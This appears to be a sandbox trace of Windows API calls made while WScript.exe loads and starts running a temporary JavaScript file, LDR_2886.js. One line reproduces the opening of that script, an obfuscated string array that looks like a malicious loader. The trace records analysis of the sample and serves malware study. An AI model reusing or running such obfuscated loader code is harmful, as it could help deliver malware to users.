	[0103.772] LoadTypeLib (in: szFile="C:\\Windows\\System32\\WScript.exe", pptlib=0x15ef50*=0x0 | out: pptlib=0x15ef50*=0x26d100) returned 0x0
	[0103.777] ITypeLib:GetTypeInfoOfGuid (in: This=0x26d100, GUID=0xffa958f0, ppTInfo=0x15ef38 | out: ppTInfo=0x15ef38*=0x26e4e8) returned 0x0
	[0103.778] ITypeInfo:GetRefTypeOfImplType (in: This=0x26e4e8, index=0xffffffff, pRefType=0x15ef30 | out: pRefType=0x15ef30*=0xfffffffe) returned 0x0
	[0103.778] ITypeInfo:GetRefTypeInfo (in: This=0x26e4e8, hreftype=0xfffffffe, ppTInfo=0xffaaf458 | out: ppTInfo=0xffaaf458*=0x26e540) returned 0x0
	[0103.778] IUnknown:Release (This=0x26e4e8) returned 0x1
	[0103.779] ??2@YAPEAX_K@Z () returned 0x425900
	[0103.779] ??2@YAPEAX_K@Z () returned 0x4259a0
	[0103.779] ??2@YAPEAX_K@Z () returned 0x425a00
	[0103.779] ITypeLib:GetTypeInfoOfGuid (in: This=0x26d100, GUID=0xffa95950, ppTInfo=0x15ef38 | out: ppTInfo=0x15ef38*=0x26e598) returned 0x0
	[0103.779] ITypeInfo:GetRefTypeOfImplType (in: This=0x26e598, index=0xffffffff, pRefType=0x15ef30 | out: pRefType=0x15ef30*=0xfffffffe) returned 0x0
	[0103.779] ITypeInfo:GetRefTypeInfo (in: This=0x26e598, hreftype=0xfffffffe, ppTInfo=0xffaaf4d8 | out: ppTInfo=0xffaaf4d8*=0x26e5f0) returned 0x0
	[0103.779] IUnknown:Release (This=0x26e598) returned 0x1
	[0103.779] ITypeLib:GetTypeInfoOfGuid (in: This=0x26d100, GUID=0xffa95960, ppTInfo=0x15ef38 | out: ppTInfo=0x15ef38*=0x26e648) returned 0x0
	[0103.779] ITypeInfo:GetRefTypeOfImplType (in: This=0x26e648, index=0xffffffff, pRefType=0x15ef30 | out: pRefType=0x15ef30*=0xfffffffe) returned 0x0
	[0103.779] ITypeInfo:GetRefTypeInfo (in: This=0x26e648, hreftype=0xfffffffe, ppTInfo=0xffaaf518 | out: ppTInfo=0xffaaf518*=0x26e6a0) returned 0x0
	[0103.779] IUnknown:Release (This=0x26e648) returned 0x1
	[0103.779] ITypeLib:GetTypeInfoOfGuid (in: This=0x26d100, GUID=0xffa95910, ppTInfo=0x15ef38 | out: ppTInfo=0x15ef38*=0x26e6f8) returned 0x0
	[0103.779] ITypeInfo:GetRefTypeOfImplType (in: This=0x26e6f8, index=0xffffffff, pRefType=0x15ef30 | out: pRefType=0x15ef30*=0xfffffffe) returned 0x0
	[0103.779] ITypeInfo:GetRefTypeInfo (in: This=0x26e6f8, hreftype=0xfffffffe, ppTInfo=0xffaaf498 | out: ppTInfo=0xffaaf498*=0x26e750) returned 0x0
	[0103.779] IUnknown:Release (This=0x26e6f8) returned 0x1
	[0103.779] IUnknown:Release (This=0x26d100) returned 0x4
	[0103.779] ??2@YAPEAX_K@Z () returned 0x425a60
	[0103.779] GetCurrentThreadId () returned 0xb9c
	[0103.779] CreateEventA (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0xcc
	[0103.779] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xffaa1cf8, lpParameter=0x425a60, dwCreationFlags=0x0, lpThreadId=0x425a88 | out: lpThreadId=0x425a88*=0x774) returned 0xd4
	[0103.780] MsgWaitForMultipleObjects (nCount=0x1, pHandles=0x15f190*=0xcc, fWaitAll=0, dwMilliseconds=0xffffffff, dwWakeMask=0xff) returned 0x0
	[0103.928] CloseHandle (hObject=0xcc) returned 1
	[0103.928] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\LDR_2886.js", nBufferLength=0x104, lpBuffer=0x15f220, lpFilePart=0x15f210 | out: lpBuffer="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\LDR_2886.js", lpFilePart=0x15f210*="LDR_2886.js") returned 0x30
	[0103.928] RegOpenKeyExW (in: hKey=0xffffffff80000000, lpSubKey=".js", ulOptions=0x0, samDesired=0x20019, phkResult=0x15e730 | out: phkResult=0x15e730*=0xe6) returned 0x0
	[0103.928] RegQueryValueExW (in: hKey=0xe6, lpValueName=0x0, lpReserved=0x0, lpType=0x15e6e0, lpData=0x15e740, lpcbData=0x15e6e4*=0x800 | out: lpType=0x15e6e0*=0x1, lpData="JSFile", lpcbData=0x15e6e4*=0xe) returned 0x0
	[0103.928] RegCloseKey (hKey=0xe6) returned 0x0
	[0103.928] RegOpenKeyExW (in: hKey=0xffffffff80000000, lpSubKey="JSFile\\ScriptEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x15e730 | out: phkResult=0x15e730*=0xe6) returned 0x0
	[0103.928] RegQueryValueExW (in: hKey=0xe6, lpValueName=0x0, lpReserved=0x0, lpType=0x15e6e0, lpData=0x15efb0, lpcbData=0x15e6e4*=0x200 | out: lpType=0x15e6e0*=0x1, lpData="JScript", lpcbData=0x15e6e4*=0x10) returned 0x0
	[0103.929] RegCloseKey (hKey=0xe6) returned 0x0
	[0103.929] ??2@YAPEAX_K@Z () returned 0x4263a0
	[0103.929] GetProcessHeap () returned 0x240000
	[0103.929] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x0, Size=0x2000) returned 0x278430
	[0103.929] CLSIDFromString (in: lpsz="JScript", pclsid=0x15ef28 | out: pclsid=0x15ef28*(Data1=0xf414c260, Data2=0x6ac0, Data3=0x11cf, Data4=([0]=0xb6, [1]=0xd1, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xbb, [6]=0xbb, [7]=0x58))) returned 0x0
	[0103.930] CoCreateInstance (rclsid=0x15ef28*(Data1=0xf414c260, Data2=0x6ac0, Data3=0x11cf, Data4=([0]=0xb6, [1]=0xd1, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xbb, [6]=0xbb, [7]=0x58)), pUnkOuter=0x0, dwClsContext=0x17, riid=0xffa91800*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x15ef20) 
	[0103.956] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x15d120 | out: lpSystemTimeAsFileTime=0x15d120*(dwLowDateTime=0xb6400b30, dwHighDateTime=0x1d543d1)) 
	[0103.956] GetCurrentProcessId () returned 0xb6c
	[0103.956] GetCurrentThreadId () returned 0xb9c
	[0103.956] GetTickCount () returned 0x2a794
	[0103.956] QueryPerformanceCounter (in: lpPerformanceCount=0x15d128 | out: lpPerformanceCount=0x15d128*=22838216170) returned 1
	[0103.956] malloc (_Size=0x100) returned 0x426670
	[0103.957] __dllonexit () returned 0x7fee1410728
	[0103.957] __dllonexit () returned 0x7fee1410780
	[0103.957] __dllonexit () returned 0x7fee1410750
	[0103.957] __dllonexit () returned 0x7fee14107b0
	[0103.957] LoadLibraryExA (lpLibFileName="ADVAPI32.dll", hFile=0x0, dwFlags=0x0) returned 0x7fefd710000
	[0103.957] GetProcAddress (hModule=0x7fefd710000, lpProcName="RegisterTraceGuidsA") returned 0x7717f570
	[0103.957] EtwRegisterTraceGuidsA () returned 0x0
	[0103.958] EtwRegisterTraceGuidsA () returned 0x0
	[0103.958] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x15cd10, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\WScript.exe" (normalized: "c:\\windows\\system32\\wscript.exe")) returned 0x1f
	[0103.958] GetProcAddress (hModule=0x7fefd710000, lpProcName="RegOpenKeyExA") returned 0x7fefd72b5f0
	[0103.958] RegOpenKeyExA (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows Script\\Features", ulOptions=0x0, samDesired=0x1, phkResult=0x15ce78 | out: phkResult=0x15ce78*=0x0) returned 0x2
	[0104.152] RegOpenKeyExA (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\COM3", ulOptions=0x0, samDesired=0x20019, phkResult=0x15ee58 | out: phkResult=0x15ee58*=0x104) returned 0x0
	[0104.152] GetProcAddress (hModule=0x7fefd710000, lpProcName="RegQueryValueExA") returned 0x7fefd72c480
	[0104.152] RegQueryValueExA (in: hKey=0x104, lpValueName="COM+Enabled", lpReserved=0x0, lpType=0x15ee50, lpData=0x15ee48, lpcbData=0x15ee40*=0x4 | out: lpType=0x15ee50*=0x4, lpData=0x15ee48*=0x1, lpcbData=0x15ee40*=0x4) returned 0x0
	[0104.152] GetProcAddress (hModule=0x7fefd710000, lpProcName="RegCloseKey") returned 0x7fefd730710
	[0104.152] RegCloseKey (hKey=0x104) returned 0x0
	[0104.153] GetModuleHandleA (lpModuleName="ole32.dll") returned 0x7fefea30000
	[0104.153] GetProcAddress (hModule=0x7fefea30000, lpProcName="CoGetObjectContext") returned 0x7fefea4c920
	[0104.153] LoadLibraryExA (lpLibFileName="ole32.dll", hFile=0x0, dwFlags=0x0) returned 0x7fefea30000
	[0104.153] GetProcAddress (hModule=0x7fefea30000, lpProcName="CoCreateInstance") returned 0x7fefea57490
	[0104.153] CoCreateInstance (in: rclsid=0x7fee147cba0*(Data1=0x323, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x7fee147cd80*(Data1=0x146, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x15ee20 | out: ppv=0x15ee20*=0x7fefec0a1b0) returned 0x0
	[0104.154] ??2@YAPEAX_K@Z () returned 0x426b30
	[0104.154] ??2@YAPEAX_KHPEBDH@Z () returned 0x425af0
	[0104.154] ??2@YAPEAX_K@Z () returned 0x426bf0
	[0104.154] ??2@YAPEAX_K@Z () returned 0x426c50
	[0104.155] ??2@YAPEAX_K@Z () returned 0x427140
	[0104.155] GetEnvironmentVariableW (in: lpName="JS_PROFILER", lpBuffer=0x15ede0, nSize=0x27 | out: lpBuffer="") returned 0x0
	[0104.155] GetUserDefaultLCID () returned 0x409
	[0104.155] IsValidLocale (Locale=0x409, dwFlags=0x1) returned 1
	[0104.155] GetLocaleInfoA (in: Locale=0x409, LCType=0x1004, lpLCData=0x15ee80, cchData=6 | out: lpLCData="1252") returned 5
	[0104.155] IsValidCodePage (CodePage=0x4e4) returned 1
	[0104.155] CoCreateInstance (in: rclsid=0x7fee1475d88*(Data1=0x6c736db1, Data2=0xbd94, Data3=0x11d0, Data4=([0]=0x8a, [1]=0x23, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xb5, [6]=0x8e, [7]=0x10)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x7fee1475d98*(Data1=0x6c736dc1, Data2=0xab0d, Data3=0x11d0, Data4=([0]=0xa2, [1]=0xad, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xf, [6]=0x27, [7]=0xe8)), ppv=0x426af0 | out: ppv=0x426af0*=0x2775b0) returned 0x0
	[0104.155] IUnknown:AddRef (This=0x2775b0) returned 0x2
	[0104.155] GetCurrentProcessId () returned 0xb6c
	[0104.155] GetCurrentThreadId () returned 0xb9c
	[0104.155] GetTickCount () returned 0x2a85f
	[0104.155] ISystemDebugEventFire:BeginSession (This=0x2775b0, guidSourceID=0x7fee1475da8, strSessionName="JScript:00002924:00002972:18174175") returned 0x0
	[0104.156] GetCurrentThreadId () returned 0xb9c
	[0104.156] ??2@YAPEAX_K@Z () returned 0x4271e0
	[0104.156] ??2@YAPEAX_K@Z () returned 0x427230
	[0104.156] malloc (_Size=0x80) returned 0x4272e0
	[0104.156] malloc (_Size=0x108) returned 0x427370
	[0104.156] GetTickCount () returned 0x2a85f
	[0104.156] GetCurrentThreadId () returned 0xb9c
	[0104.156] ??2@YAPEAX_K@Z () returned 0x427480
	[0104.156] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\LDR_2886.js" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\temp\\ldr_2886.js"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000000, hTemplateFile=0x0) returned 0x110
	[0104.156] GetFileSize (in: hFile=0x110, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x4b68
	[0104.156] CreateFileMappingA (hFile=0x110, lpFileMappingAttributes=0x0, flProtect=0x2, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x4b68, lpName=0x0) returned 0x114
	[0104.156] MapViewOfFile (hFileMappingObject=0x114, dwDesiredAccess=0x4, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x210000
	[0104.156] GetVersionExA (in: lpVersionInformation=0x15f030*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x0, dwMinorVersion=0xfd343301, dwBuildNumber=0x7fe, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x15f030*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0104.156] IsTextUnicode (in: lpv=0x210000, iSize=19304, lpiResult=0x15f020 | out: lpiResult=0x15f020) returned 0
	[0104.156] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x210000, cbMultiByte=19304, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 19304
	[0104.157] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x210000, cbMultiByte=19304, lpWideCharStr=0x27f978, cchWideChar=19304 | out: lpWideCharStr="var dogoswoisosfhsdiefgssqda=['wqtowqjClg==','w5Mcwr/DvcOsK2cuBQ==','wrvDpsOqD8KNwpbCjh8pasKgV8Ozb1xZw7jDu8OwwrtSXDnDgMOwa0XCr8OAw69Dw79yA8OW','w5/Cn8KKbMK5HsOefsOg','MErCsEPDhcKacRHCmA==','wozDhsKiwrPDl8KxFAY=','woHDt2ZcPMOsGXtZQcOIwrnDj1lVNsOURHfDgl0kw4tDw4RSw7HCn8Omw5JpXDotC8O7eMKVwpxeYw==','wrDCpsOTwqBiwqfDjELCj27CoETDmHnDnxhqw5fClMKJGsOzwoPCqcOYQm1XW3sBCsOEPcKfZiU7EzrDuMODwp7Cp8OaKMOHw4wDVD5ZfMONfsO/w5c/wq5Ww7jChcOTwrNeIGbDs8KrPVvDqyEjOsKmKDxiwp5aw7jCtgTDuxxXacO3OHJsVk5XwozDvzrCpg==','wqprwqgaw4jCih0=','wofDo8KZwpvDq8KMYn/ConzDt8Kyw6xiQsOIE8OWwrFHPsO3w4PCiEHCk8K3wq7Cn1g=','wozDkcKcwozCmMO4Ew3CojHCnQ==','w7JGw6XCpS4=','w49sw43DuMKR','wrVrwr05w4o=','w4QQwpzCqMK9','wqrDu8OaCsOw','AHliEUE=','UxoSMTA=','UhQDDwg=','cwtkccKr','w79Mw6/DjsKfwqnCi8OTw5FhG8OgFnpkJA==','wowhFljClA==','csO8AMOuZA==','bhADAg==','woTCr8Owwr1N','TErDmMK6wos=','NAbDsMOpNw==','wq7DmsKJw4Z5','wqvCvEbCoks=','w5DDszthPQ==','wrDDgcKlZsKz','wqnDjsKVXcK9','wrrCs8KEDcOY','WcKzfsKnfA==','QTp1VsKB','wqrDicOVbsKL','enXCv8K7','w64uwqc2w4Y=','HnBCBg==','wqYCYQYf','XFbDmMKnwoDCi8Kew6/DpmjCrg==','wo1iUsO9Pw==','w7zDgcOjP8Kt','Rg11bsKR','w5pBwqUBwo8=','O2XCk8O/w6A=','woXCk8OZwrZq','wrvCu8Owwot+','wq5owo0pw64=','ZsOmG8OlTw==','e8OPwq4qMQ==','YhZ3d8Ki','w4BbwpvCt8OY','w7o+woQsw4s=','wojDosO+LcOW','ZH7DvC/DlQ==','c3dOwozChQ==','woVCZsOBPw==','TQxZW8Kn','PRTDssOyFw==','wpcDwpvDmsOo','RlTDuMKywqA=','NsKlecK7w7Q=','YMO/EsOldg==','w55Qw7nDosKj','w5DDmcOseDvDjsKhw4jChX0cVA3DkW/CqMKTw5QLXMOHcMKowrrCux1bwqoBRsKPw79aAGMbw6B4ZTLCrMKKBsKVwq7DglMRK8KRHjTCuMK8w514JxRiwr3DgcKX','wrXClsKBHMOa','wofDu8OVNsOZ','wqXCksOSwoU=','w61Jw6zCsCs=','XMOwOcOz','w6fCq8OoGWE=','LFYlKX0=','wobCgcKOw6ck','w7NpwpfCksOK','GUTCrcOhw7k=','HMOuwqLCn18=','w51Lw7zCoyo=','woZ5TMO8HA==','wqIMDH3Cr8KFQyNUwq8w','w5zDt2Mxwqc=','CMKwDcOTw4w=','I1NBHlA=','w4ljw6XCpzE=','wp8zwqLDkMOy','wqLCh8ONwph/','w7/DmMOLMA==','wqDDnMO6ZcKf','w4V4wp4RwoweF8OtH110dE4=','wp7DoMO6PsOVw5ZJFsOQbMKJCELCow==','DEvCrcOWw6hQwq4jKMOWHwrCqMK+w7J1wqPDhyk=','wpAMI0DCkw==','w7DDuH0rwr8=','OSrDhsOAOcKVQsKIXFXDpsOIwrYRwo0y','wpfCvMOQwotA','wqXCi1rCgm0=','d37CtMK6','F3JpGko=','wpfCnsKzOsO2','Gn9GHWs=','WlXDnsKKwok=','P8OnwrPDp8K6','XQxsS8KX','w4BBw5LDmsKj','LMOVwqvClsOq','wqHChUHCrmc=','dnfCl8KKw4s=','wrzDi8KEw75j','w5ELwpUqw5E=','HGLCv8O5w4M=','O8OCwpfCs0s=','w59uw6rDmMK/','NsOTwonCnms=','OcOrwqvCvV4=','VUHDj8KFwrE=','w6PDssO3KsKg','VcKqXMKseA==','KcOWwpHDq8KJ','wonDtcKkwqlF','wrjCt8KIw5gFIQ==','G8Orwr/DsAE=','w51iwpwgwpw=','wrrDi8KQw75X','U2hiwoPClA==','wovDjsKpwohCQw4=','PVV+A0E=','w75OwpMEwpEG','RQYPLiM=','TUPDoSjDng==','w6nDigxBCw==','wrTCnsK5LMOh','esKJZMKIfA==','wqgkNXTCng==','JMOKw7zCvw==','wrENRAc5','O8OUwpHDpsKa','eXfCuMK8','BznDhcORJw==','QmRawpbCosOIe8KsEXTCow==','UEdxwqTCpQ==','w4xdw4/CpSY=','H8OFwrTDisKc','SMOdwo8SPA==','d8KmRcKYew==','w7ELwoLCj8KIw4F4','G8OZwoTDiTw=','wq7DhcKYwrdc','wpvCgMK2M8OR','wpHDr8Krw5Fh','wqfDl8K7wrTDrg==','YcOhanFu','IcO7w6bChSI=','wqfDoMK0bMKm','wqrChcKCH8O0','w5Zww6DDrsKS','w4TDmMOjEMKg','PDDDhsOQOcKOWMKFCBDDiA==','wqrDnMKkwo7Dn8O0G0nCgW3Dg8ORwq9ISg==','w7TDh8OSMsKR','PSfDscOCHg==','wqXCsE7CsnM=','w5TDkSVzAQ==','PsONwrHDlCg=','MsOKwpzDlMKK','RWYWwpnDvg==','woMbB1bCqQ==','wqbCmsKQw6Ia','wo7DqMKtVMKt','czRabsKB','ADDCiTnDhcOhGn/Diix+woFBwptnaMKKTcOlwo3DgMOEwq1GwobDjMKxw5PDtcOtwoLDlsOgw57DuFUgwrVcwqcJMR7CnmbCnQbDnAhKw7QHwrhuM8Odw68AFcKbOsOB','w5DDt1cuwo8=','W0fDisKn','wobDhMKSwoh5','cVrCm8K+w6A=','w6HDksORKg==','wrfCpVHCjlM=','w7dEw7fCly8=','w6fDrTNQJg==','w6wne8Oiw50=','woJqwokjw50=','wqjClMKNw4gz','Fl3CgljCqw==','woddeMOeMsKJwoHCj8OaNno=','wo0rFljCjQ==','w5FWw6rChig=','wpHDqsK2w4Y=','wqHCs1rCuw==','w6NfwprCsMO1FA==','BsKiMcORw5M=','w4tHw5bCsgw=','w5YwRsOmw6HDicKQw7ZEXcOB','w6UMwp7CjcKZwoQiwo5zdHrDj8KBRsOf','wqEmXCgH','S8O6JMO0aMKow7A1bQLCrg==','w6QTZcO8w7o=','fcKneMK0SA==','woPDj8OdUcKH','w4Ffw6zDn8KB','f0fCl8KIw6E=','w6jCvMOqPXU=','wp3CjMKCw4cN','wrYOcRgw','wpx6wpQ+w5U=','w6nClMO6Ilc=','w7rDgMOvGMKM','wqfDtMKTU8Ky','wrjCkFXCgGfDpMODwprDh8OMwrnDs8KiSgsWwplte8K1woILw4rCs8KbRQ0CwqpeGR1qwrvDv2zCmQnDozBPOcKlU8KDdwZ5V8KzbsKhwrrDtMOQwrlGFsKmw7JSNmF5BsOTLsKMHF9kwoHCmsOzLx3Dg8KsbcKkFcKuNnvCjA==','w43DlsKCHMKLwqDChxo5TcKScsO6fWQ8w47DvcObwr9UT3fDhsOpW0vCvMOLw4Mrw6BAdMOfw4XCiULCsXXDlcOlRsKXLRA2woLDoMOvw47DkMO2w6YIw6DDqsO1w7/DmsKndWATwoU3w4ozwqdLYsOsJ0XCrw==','w51Tw57CqzXDuQ==','WsKDc8KJ','Bz7DhMKND8KfesK+HR7DuMKDw4Fj','w5lhw43Cvg7Dj8OMwoDDjmE7exhkLcKCGcOiwoYwdsKlwonDu8OAwqlWfyXDiWNDeBHDlX4YbMKuFHjCpsKTFMOTwqdCwqJQwpDDpyVmFMKyO8O0w5MQw5oxwqvDj1XDpG/DrcKtw6A5wqvCkUA=','C0PCtErCp8KoZRjCkRAMwpo+w7w8d8KpA8OUw6XCjMKxwrIMwqrCoA==','w7Nowr8AwrI2AsK1FndyT3rDgMOWw68CLcKLF2QawpVtdMOHKFdFCXgLw4fCosO7D3gncsK/ScOow74dw6jCp8KZTcKHw4PCrcKbwqbCp8Oew5M7wrDDhsOaDcO9','OcOlwq3CucO2w5hLw4N0CcO1w4A=','Vn7DjiDDu8Kjw4I9wrRPwr3CrAzCh0I=','w7XDjWwjwrzCoANpAMOlSCgQB8OPBA==','T0gswqrDrcObbRBLLsONwpHCrMOzw41vw6LDnR3CgEJxw4/DgMKbTcOOTMOVw4BEw5TDtcOPSw==','w4BfwrnCgcO7ImweNx7CiMObw6EdeCXDigHCnzU=','wp/Dl8KawrrDm8KzcQ==','bnwjwpPDm8KqD1F+','B8KyGsOh','K8O1wqnDsiTCnMKtwrYTfQ/CpcK8EUbCuBUuw5nCncOlw4PCsmEpwr7CgcKtEQ==','wq7CksKWw50u','wrPDh8O8WMKvEsOESMOFQMKgXXPDqsKEX8KlIsO2NELDu8KvA8Olw6cOL8K6wqDCukkVS8Oswr06Di/CocOmRsO6wptnwoNtAMKzw6lRw5ofPMOHNhJb") returned 19304
	[0104.157] UnmapViewOfFile (lpBaseAddress=0x210000) returned 1
	[0104.158] CloseHandle (hObject=0x114) returned 1
	[0104.158] CloseHandle (hObject=0x110) returned 1
	[0104.158] GetSystemDirectoryA (in: lpBuffer=0x15f0a8, uSize=0x0 | out: lpBuffer="\xec\xf4\x15") returned 0x14
	[0104.158] ??2@YAPEAX_K@Z () returned 0x4274d0
	[0104.158] GetSystemDirectoryA (in: lpBuffer=0x4274d0, uSize=0x15 | out: lpBuffer="C:\\Windows\\system32") returned 0x13
	[0104.158] LoadLibraryA (lpLibFileName="C:\\Windows\\system32\\advapi32.dll") returned 0x7fefd710000
	[0104.158] ??3@YAXPEAX@Z () returned 0x57760f01
	[0104.158] GetProcAddress (hModule=0x7fefd710000, lpProcName="SaferIdentifyLevel") returned 0x7fefd72e470
	[0104.158] GetProcAddress (hModule=0x7fefd710000, lpProcName="SaferComputeTokenFromLevel") returned 0x7fefd72f9b0
	[0104.158] GetProcAddress (hModule=0x7fefd710000, lpProcName="SaferCloseLevel") returned 0x7fefd72f660
	[0104.158] IdentifyCodeAuthzLevelW () returned 0x1
	[0104.566] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x15e220 | out: lpSystemTimeAsFileTime=0x15e220*(dwLowDateTime=0xb69ce0d0, dwHighDateTime=0x1d543d1)) 
	[0104.566] GetCurrentProcessId () returned 0xb6c
	[0104.566] GetCurrentThreadId () returned 0xb9c
	[0104.566] GetTickCount () returned 0x2a9f4
	[0104.566] QueryPerformanceCounter (in: lpPerformanceCount=0x15e228 | out: lpPerformanceCount=0x15e228*=22899250398) returned 1
	[0104.567] malloc (_Size=0x100) returned 0x427e40
	[0104.567] GetVersionExA (in: lpVersionInformation=0x15e000*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x0, dwMinorVersion=0xe33af810, dwBuildNumber=0x7fe, dwPlatformId=0xe33a0000, szCSDVersion="\xfe\x07") | out: lpVersionInformation=0x15e000*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0104.567] GetUserDefaultLCID () returned 0x409
	[0104.567] IsFileSupportedName () returned 0x1
	[0104.567] _wcsicmp (_String1=".vbs", _String2=".js") returned 12
	[0104.567] _wcsicmp (_String1=".vbe", _String2=".js") returned 12
	[0104.567] _wcsicmp (_String1=".js", _String2=".js") returned 0
	[0104.571] GetSignedDataMsg () returned 0x0
	[0104.571] GetCurrentProcess () returned 0xffffffffffffffff
	[0104.571] DuplicateHandle (in: hSourceProcessHandle=0xffffffffffffffff, hSourceHandle=0x114, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0x15e860, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x15e860*=0x140) returned 1
	[0104.571] GetFileSize (in: hFile=0x140, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x4b68
	[0104.571] ??2@YAPEAX_K@Z () returned 0x42a210
	[0104.571] SetFilePointer (in: hFile=0x140, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0104.571] ReadFile (in: hFile=0x140, lpBuffer=0x42a210, nNumberOfBytesToRead=0x4b68, lpNumberOfBytesRead=0x15e840, lpOverlapped=0x0 | out: lpBuffer=0x42a210*, lpNumberOfBytesRead=0x15e840*=0x4b68, lpOverlapped=0x0) returned 1
	[0104.572] CoInitialize (pvReserved=0x0) returned 0x1
	[0104.572] CoCreateInstance (in: rclsid=0x7fee33af850*(Data1=0x6290bd1, Data2=0x48aa, Data3=0x11d2, Data4=([0]=0x84, [1]=0x32, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x7fee33af860*(Data1=0xe4d1c9b0, Data2=0x46e8, Data3=0x11d4, Data4=([0]=0xa2, [1]=0xa6, [2]=0x0, [3]=0x10, [4]=0x4b, [5]=0xd3, [6]=0x50, [7]=0x90)), ppv=0x15e7b0 | out: ppv=0x15e7b0*=0x42f1e0) returned 0x0
	[0104.576] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x15c9b0 | out: lpSystemTimeAsFileTime=0x15c9b0*(dwLowDateTime=0xb69f4230, dwHighDateTime=0x1d543d1)) 
	[0104.576] GetCurrentProcessId () returned 0xb6c
	[0104.576] GetCurrentThreadId () returned 0xb9c
	[0104.576] GetTickCount () returned 0x2aa04
	[0104.576] QueryPerformanceCounter (in: lpPerformanceCount=0x15c9b8 | out: lpPerformanceCount=0x15c9b8*=22900185213) returned 1
	[0104.576] malloc (_Size=0x100) returned 0x427f50
	[0104.576] __dllonexit () returned 0x7fedf7914c0
	[0104.576] __dllonexit () returned 0x7fedf7914e8
	[0104.576] GetVersionExA (in: lpVersionInformation=0x15c790*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x7fe, dwMinorVersion=0xdf792dc9, dwBuildNumber=0x7fe, dwPlatformId=0xdf7914e8, szCSDVersion="\xfe\x07") | out: lpVersionInformation=0x15c790*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0104.576] GetProcessWindowStation () returned 0x30
	[0104.576] GetUserObjectInformationA (in: hObj=0x30, nIndex=1, pvInfo=0x15c778, nLength=0xc, lpnLengthNeeded=0x15c770 | out: pvInfo=0x15c778, lpnLengthNeeded=0x15c770) returned 1
	[0104.576] ??2@YAPEAX_K@Z () returned 0x42ed80
	[0104.576] ??2@YAPEAX_K@Z () returned 0x42edd0
	[0104.576] ??2@YAPEAX_K@Z () returned 0x42ee00
	[0104.576] ??2@YAPEAX_K@Z () returned 0x42ee40
	[0104.576] ??2@YAPEAX_K@Z () returned 0x42ee80
	[0104.576] ??2@YAPEAX_K@Z () returned 0x42eec0
	[0104.576] ??2@YAPEAX_K@Z () returned 0x42ef00
	[0104.576] ??2@YAPEAX_K@Z () returned 0x42ef40
	[0104.576] ??2@YAPEAX_K@Z () returned 0x42ef80
	[0104.577] ??2@YAPEAX_K@Z () returned 0x42efc0
	[0104.577] ??2@YAPEAX_K@Z () returned 0x42f000
	[0104.577] ??3@YAXPEAX@Z () returned 0x57760f01
	[0104.577] ??2@YAPEAX_K@Z () returned 0x42f050
	[0104.577] ??2@YAPEAX_K@Z () returned 0x42f090
